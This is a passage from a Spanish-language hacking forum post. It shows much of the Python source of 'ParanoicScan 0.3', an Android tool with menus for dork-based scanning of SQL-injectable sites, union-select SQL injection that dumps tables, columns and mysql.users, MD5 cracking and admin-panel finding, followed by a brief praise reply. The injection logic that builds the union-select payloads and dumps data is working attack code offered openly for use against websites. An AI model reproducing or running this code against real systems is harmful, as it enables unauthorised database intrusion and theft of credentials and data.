  610.   if not ref['which'] == 'positive' :
  611.    menuencoder()
  612.   else:
  613.    texto = ref['value']
  614.  
  615.    aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
  616.    aplicacion.dialogShow()
  617.  
  618.    don = hexencoder(texto)
  619.  
  620.    aplicacion.dialogDismiss()
  621.  
  622.    aplicacion.dialogCreateAlert("Hex Encoder",don)
  623.    aplicacion.dialogSetPositiveButtonText("Done")
  624.    aplicacion.dialogShow()
  625.  
  626.    op = aplicacion.dialogGetResponse().result
  627.  
  628.    if op["which"] == "positive" :
  629.     menuencoder()
  630.  
  631.  
  632.  if reb==4 :
  633.  
  634.   aplicacion.dialogCreateAlert("Hex Decoder")
  635.  
  636.   aplicacion.dialogGetInput("Hex Decoder","Enter Text")
  637.   ref = aplicacion.dialogGetResponse().result
  638.  
  639.   if not ref['which'] == 'positive' :
  640.    menuencoder()
  641.   else:
  642.    texto = ref['value']
  643.  
  644.    aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
  645.    aplicacion.dialogShow()
  646.  
  647.    don = hexdecoder(texto)
  648.  
  649.    aplicacion.dialogDismiss()
  650.  
  651.    aplicacion.dialogCreateAlert("Hex Decoder",don)
  652.    aplicacion.dialogSetPositiveButtonText("Done")
  653.    aplicacion.dialogShow()
  654.  
  655.    op = aplicacion.dialogGetResponse().result
  656.  
  657.    if op["which"] == "positive" :
  658.     menuencoder()
  659.  
  660.  if reb==5:
  661.   menu()
  662.  
  663. def menusql():
  664.  
  665.  aplicacion.dialogCreateAlert("SQLI Scanner")
  666.  aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
  667.  aplicacion.dialogShow()
  668.  reez = aplicacion.dialogGetResponse().result
  669.  opsql = reez["item"]
  670.  
  671.  if opsql==0:
  672.          
  673.   aplicacion.dialogCreateAlert("SQLI Scanner")
  674.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
  675.   aplicacion.dialogShow()
  676.  
  677.   don = showtables(webvul)
  678.  
  679.   aplicacion.dialogDismiss()
  680.  
  681.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  682.   aplicacion.dialogSetPositiveButtonText("Done")
  683.   aplicacion.dialogShow()
  684.  
  685.   op = aplicacion.dialogGetResponse().result
  686.  
  687.   if op["which"] == "positive" :
  688.    menusql()
  689.    
  690.  if opsql==1 :
  691.          
  692.   aplicacion.dialogCreateAlert("SQLI Scanner")
  693.  
  694.   aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  695.   ref = aplicacion.dialogGetResponse().result
  696.  
  697.   if not ref['which'] == 'positive' :
  698.    menusql()
  699.   else:  
  700.    tabla = ref['value']
  701.  
  702.    aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
  703.    aplicacion.dialogShow()
  704.  
  705.    don = showcolumns(webvul,tabla)
  706.    
  707.    aplicacion.dialogDismiss()
  708.  
  709.    aplicacion.dialogCreateAlert("SQLI Scanner",don)
  710.    aplicacion.dialogSetPositiveButtonText("Done")
  711.    aplicacion.dialogShow()
  712.  
  713.    op = aplicacion.dialogGetResponse().result
  714.  
  715.    if op["which"] == "positive" :
  716.     menusql()
  717.    
  718.  if opsql==2 :
  719.  
  720.   aplicacion.dialogCreateAlert("SQLI Scanner")
  721.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
  722.   aplicacion.dialogShow()
  723.  
  724.   don = showdbs(webvul)
  725.  
  726.   aplicacion.dialogDismiss()
  727.  
  728.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  729.   aplicacion.dialogSetPositiveButtonText("Done")
  730.   aplicacion.dialogShow()
  731.  
  732.   op = aplicacion.dialogGetResponse().result
  733.  
  734.   if op["which"] == "positive" :
  735.    menusql()
  736.    
  737.  if opsql==3 :
  738.  
  739.   aplicacion.dialogCreateAlert("SQLI Scanner")
  740.  
  741.   aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  742.   ref = aplicacion.dialogGetResponse().result
  743.  
  744.   if not ref['which'] == 'positive' :
  745.    menusql()
  746.   else:  
  747.    db = ref['value']
  748.  
  749.    aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
  750.    aplicacion.dialogShow()
  751.  
  752.    don = showtablesdb(webvul,db)
  753.    
  754.    aplicacion.dialogDismiss()
  755.  
  756.    aplicacion.dialogCreateAlert("SQLI Scanner",don)
  757.    aplicacion.dialogSetPositiveButtonText("Done")
  758.    aplicacion.dialogShow()
  759.  
  760.    op = aplicacion.dialogGetResponse().result
  761.  
  762.    if op["which"] == "positive" :
  763.     menusql()
  764.  
  765.  if opsql==4 :
  766.  
  767.   aplicacion.dialogCreateAlert("SQLI Scanner")
  768.  
  769.   aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  770.   ref = aplicacion.dialogGetResponse().result
  771.  
  772.   if not ref['which'] == 'positive' :
  773.    menusql()
  774.   else:  
  775.    db = ref['value']
  776.  
  777.    aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  778.    ref = aplicacion.dialogGetResponse().result
  779.  
  780.    if not ref['which'] == 'positive' :
  781.     menusql()
  782.    else:
  783.     tabla = ref['value']
  784.     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
  785.     aplicacion.dialogShow()
  786.  
  787.     don = showcolumnsdb(webvul,db,tabla)
  788.    
  789.     aplicacion.dialogDismiss()
  790.  
  791.     aplicacion.dialogCreateAlert("SQLI Scanner",don)
  792.     aplicacion.dialogSetPositiveButtonText("Done")
  793.     aplicacion.dialogShow()
  794.  
  795.     op = aplicacion.dialogGetResponse().result
  796.  
  797.     if op["which"] == "positive" :
  798.      menusql()
  799.  
  800.  if opsql==5 :
  801.  
  802.   aplicacion.dialogCreateAlert("SQLI Scanner")
  803.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
  804.   aplicacion.dialogShow()
  805.  
  806.   don = mysqluser(webvul)
  807.  
  808.   aplicacion.dialogDismiss()
  809.  
  810.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  811.   aplicacion.dialogSetPositiveButtonText("Done")
  812.   aplicacion.dialogShow()
  813.  
  814.   op = aplicacion.dialogGetResponse().result
  815.  
  816.   if op["which"] == "positive" :
  817.    menusql()
  818.  
  819.  if opsql==6 :
  820.  
  821.   aplicacion.dialogCreateAlert("SQLI Scanner")
  822.   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
  823.   aplicacion.dialogShow()
  824.  
  825.   don = more(webvul)
  826.  
  827.   aplicacion.dialogDismiss()
  828.  
  829.   aplicacion.dialogCreateAlert("SQLI Scanner",don)
  830.   aplicacion.dialogSetPositiveButtonText("Done")
  831.   aplicacion.dialogShow()
  832.  
  833.   op = aplicacion.dialogGetResponse().result
  834.  
  835.   if op["which"] == "positive" :
  836.    menusql()
  837.  
  838.  if opsql==7 :
  839.  
  840.   aplicacion.dialogCreateAlert("SQLI Scanner")
  841.  
  842.   aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  843.   ref = aplicacion.dialogGetResponse().result
  844.  
  845.   if not ref['which'] == 'positive' :
  846.    menusql()
  847.   else:  
  848.    tabla = ref['value']
  849.  
  850.    aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
  851.    ref = aplicacion.dialogGetResponse().result
  852.  
  853.    if not ref['which'] == 'positive' :
  854.     menusql()
  855.    else:
  856.     columna1 = ref['value']
  857.     aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
  858.     ref = aplicacion.dialogGetResponse().result
  859.     if not ref['which'] == 'positive' :
  860.      menusql()
  861.     else:  
  862.      columna2 = ref['value']
  863.      aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
  864.      aplicacion.dialogShow()
  865.  
  866.      don = dumper(webvul,tabla,columna1,columna2)
  867.    
  868.      aplicacion.dialogDismiss()
  869.      aplicacion.dialogCreateAlert("SQLI Scanner",don)
  870.      aplicacion.dialogSetPositiveButtonText("Done")
  871.      aplicacion.dialogShow()  
  872.      op = aplicacion.dialogGetResponse().result
  873.  
  874.      if op["which"] == "positive" :
  875.       menusql()
  876.  
  877.  if opsql==8:
  878.   menu()
  879.  
  880. def menu():
  881.  
  882.  aplicacion.dialogCreateAlert("ParanoicScan 0.3 (C) Doddy Hackman 2014")
  883.  aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
  884.  aplicacion.dialogShow()
  885.  re = aplicacion.dialogGetResponse().result
  886.  re2 = re["item"]
  887.  
  888.  if re2==0:
  889.  
  890.   aplicacion.dialogCreateAlert("BingHack Tool")
  891.  
  892.   aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
  893.   ref = aplicacion.dialogGetResponse().result
  894.  
  895.   if not ref['which'] == 'positive' :
  896.    menu()
  897.   else:  
  898.    dork = ref['value']
  899.  
  900.    aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
  901.    ref = aplicacion.dialogGetResponse().result
  902.  
  903.    if not ref['which'] == 'positive' :
  904.     menu()
  905.    else:
  906.     paginas = ref['value']
  907.  
  908.     paginas = str(paginas)
  909.  
  910.     aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
  911.     aplicacion.dialogShow()
  912.  
  913.     founds = ""
  914.     rez = ""
  915.     rtafinal = ""
  916.  
  917.     founds = bingscan(dork,paginas)
  918.  
  919.     aplicacion.dialogDismiss()
  920.  
  921.     aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
  922.     aplicacion.dialogShow()
  923.  
  924.     rez = sqltest(founds)
  925.  
  926.     if len(rez) == 0 :
  927.      rtafinal = "[-] Not Found"
  928.     else :
  929.      rtafinal = "[++] Pages Founds\n\n"
  930.      rtafinal = rtafinal + rez
  931.      rtafinal = rtafinal + "\n[++] Finished\n"
  932.  
  933.     aplicacion.dialogDismiss()
  934.  
  935.     aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
  936.     aplicacion.dialogSetPositiveButtonText("Done")
  937.     aplicacion.dialogShow()
  938.  
  939.     op = aplicacion.dialogGetResponse().result
  940.     if op["which"] == "positive" :
  941.      menu()
  942.  
  943.  if re2==1 :
  944.          
  945.   global webvul
  946.  
  947.   aplicacion.dialogCreateAlert("SQLI Scanner")
  948.  
  949.   aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
  950.   ref = aplicacion.dialogGetResponse().result
  951.  
  952.   if not ref['which'] == 'positive' :
  953.    menu()
  954.   else:  
  955.    web = ref['value']
  956.    aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
  957.    aplicacion.dialogShow()
  958.  
  959.    pass1,pass2 = bypass("--")
  960.    code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
  961.    codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
  962.  
  963.    if not code==codedos:
  964.     aplicacion.dialogDismiss()
  965.     aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
  966.     aplicacion.dialogSetPositiveButtonText("Done")
  967.     aplicacion.dialogShow()
  968.     op = aplicacion.dialogGetResponse().result
  969.     if op["which"] == "positive" :
  970.  
  971.      pass1,pass2 = bypass("--")
  972.      rtacondata = ""
  973.      control_sql = 0
  974.  
  975.      aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
  976.      aplicacion.dialogShow()
  977.  
  978.      number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
  979.      for te in range(2,30):
  980.       number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  981.       code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  982.       if(regexver(code)):
  983.        numbers = regexdar(code)
  984.        
  985.        control_sql = 1
  986.  
  987.        rtacondata = rtacondata + "[+] Column length : "+str(te)
  988.        rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"
  989.  
  990.        sql = ""
  991.        tex = te + 1
  992.        for sqlix in range(2,tex):
  993.         sql = str(sql)+","+str(sqlix)
  994.         sqli  = str(1)+sql
  995.        sqla = reem(sqli,numbers[0])
  996.        aplicacion.dialogDismiss()
  997.        aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
  998.        aplicacion.dialogSetPositiveButtonText("Done")
  999.        aplicacion.dialogShow()
  1000.        op = aplicacion.dialogGetResponse().result
  1001.        if op["which"] == "positive" :
  1002.             webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
  1003.             menusql()
  1004.  
  1005.      if control_sql==0:
  1006.  
  1007.       aplicacion.dialogDismiss()
  1008.       aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
  1009.       aplicacion.dialogSetPositiveButtonText("Done")
  1010.       aplicacion.dialogShow()
  1011.       op = aplicacion.dialogGetResponse().result
  1012.       if op["which"] == "positive" :
  1013.        aplicacion.exit()
  1014.  
  1015.    else:
  1016.     aplicacion.dialogDismiss()
  1017.     aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
  1018.     aplicacion.dialogSetPositiveButtonText("Done")
  1019.     aplicacion.dialogShow()
  1020.     op = aplicacion.dialogGetResponse().result
  1021.     if op["which"] == "positive" :
  1022.      aplicacion.exit()
  1023.  
  1024.  if re2==2 :
  1025.  
  1026.   aplicacion.dialogCreateAlert("MD5 Cracker")
  1027.  
  1028.   aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
  1029.   ref = aplicacion.dialogGetResponse().result
  1030.  
  1031.   if not ref['which'] == 'positive' :
  1032.    menu()
  1033.   else:  
  1034.    target = ref['value']
  1035.  
  1036.    aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
  1037.    aplicacion.dialogShow()
  1038.  
  1039.    don = crackmd5(target)
  1040.  
  1041.    aplicacion.dialogDismiss()
  1042.  
  1043.    aplicacion.dialogCreateAlert("MD5 Cracker",don)
  1044.    aplicacion.dialogSetPositiveButtonText("Done")
  1045.    aplicacion.dialogShow()
  1046.  
  1047.    op = aplicacion.dialogGetResponse().result
  1048.  
  1049.    if op["which"] == "positive" :
  1050.     menu()
  1051.  
  1052.  if re2==3 :
  1053.  
  1054.   aplicacion.dialogCreateAlert("Admin Finder")
  1055.  
  1056.   aplicacion.dialogGetInput("Admin Finder","Enter Target")
  1057.   ref = aplicacion.dialogGetResponse().result
  1058.  
  1059.   if not ref['which'] == 'positive' :
  1060.    menu()
  1061.   else:  
  1062.    target = ref['value']
  1063.  
  1064.    aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
  1065.    aplicacion.dialogShow()
  1066.  
  1067.    don = scanpanel(target)
  1068.  
  1069.    aplicacion.dialogDismiss()
  1070.  
  1071.    aplicacion.dialogCreateAlert("Admin Finder",don)
  1072.    aplicacion.dialogSetPositiveButtonText("Done")
  1073.    aplicacion.dialogShow()
  1074.  
  1075.    op = aplicacion.dialogGetResponse().result
  1076.  
  1077.    if op["which"] == "positive" :
  1078.     menu()
  1079.  
  1080.  if re2==4 :
  1081.  
  1082.   aplicacion.dialogCreateAlert("LocateIP")
  1083.  
  1084.   aplicacion.dialogGetInput("LocateIP","Enter Target")
  1085.   ref = aplicacion.dialogGetResponse().result
  1086.  
  1087.   if not ref['which'] == 'positive' :
  1088.    menu()
  1089.   else:
  1090.    target = ref['value']
  1091.  
  1092.    aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
  1093.    aplicacion.dialogShow()
  1094.  
  1095.    don = locateip(target)
  1096.  
  1097.    aplicacion.dialogDismiss()
  1098.  
  1099.    aplicacion.dialogCreateAlert("LocateIP",don)
  1100.    aplicacion.dialogSetPositiveButtonText("Done")
  1101.    aplicacion.dialogShow()
  1102.  
  1103.    op = aplicacion.dialogGetResponse().result
  1104.  
  1105.    if op["which"] == "positive" :
  1106.     menu()
  1107.  
  1108.  if re2==5 :
  1109.  
  1110.   aplicacion.dialogCreateAlert("HTTP FingerPrinting")
  1111.  
  1112.   aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
  1113.   ref = aplicacion.dialogGetResponse().result
  1114.  
  1115.   if not ref['which'] == 'positive' :
  1116.    menu()
  1117.   else:
  1118.    target = ref['value']
  1119.  
  1120.    aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
  1121.    aplicacion.dialogShow()
  1122.  
  1123.    don = httpfinger(target)
  1124.  
  1125.    aplicacion.dialogDismiss()
  1126.  
  1127.    aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
  1128.    aplicacion.dialogSetPositiveButtonText("Done")
  1129.    aplicacion.dialogShow()
  1130.  
  1131.    op = aplicacion.dialogGetResponse().result
  1132.  
  1133.    if op["which"] == "positive" :
  1134.     menu()
  1135.  
  1136.  if re2==6 :
  1137.   menuencoder()
  1138.  
  1139.  if re2==7 :
  1140.  
  1141.    about = "This program was written by Doddy Hackman in the summer of 2014"
  1142.    aplicacion.dialogCreateAlert("About",about)
  1143.    aplicacion.dialogSetPositiveButtonText("Done")
  1144.    aplicacion.dialogShow()
  1145.  
  1146.    op = aplicacion.dialogGetResponse().result
  1147.  
  1148.    if op["which"] == "positive" :
  1149.     menu()
  1150.  
  1151.  if re2==8 :
  1152.   aplicacion.exit()
  1153.  
  1154. menu()
  1155.  
  1156. # The End ?
  1157.  

Si quieren bajarlo lo pueden hacer de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
« Última modificación: Septiembre 03, 2014, 12:32:33 pm por Jimeno »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5301
  • Actividad:
    40%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Febrero 03, 2014, 10:24:11 am »
Excelenteeee!!
Muy buena doddy!!


 

¿Te gustó el post? COMPARTILO!



[Código] Yardas a metros - Metros a yardas [Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1205
Último mensaje Mayo 29, 2011, 01:27:34 am
por LucaSthefano
Python Trojan - By "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 1
Vistas: 1830
Último mensaje Abril 03, 2010, 11:01:59 pm
por Dharok
Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2266
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
Python keylogger - by "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 0
Vistas: 1808
Último mensaje Abril 07, 2010, 03:30:22 am
por d33k40
[Código] Entero / No Entero [Ejercicio - Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1172
Último mensaje Mayo 29, 2011, 01:24:09 am
por LucaSthefano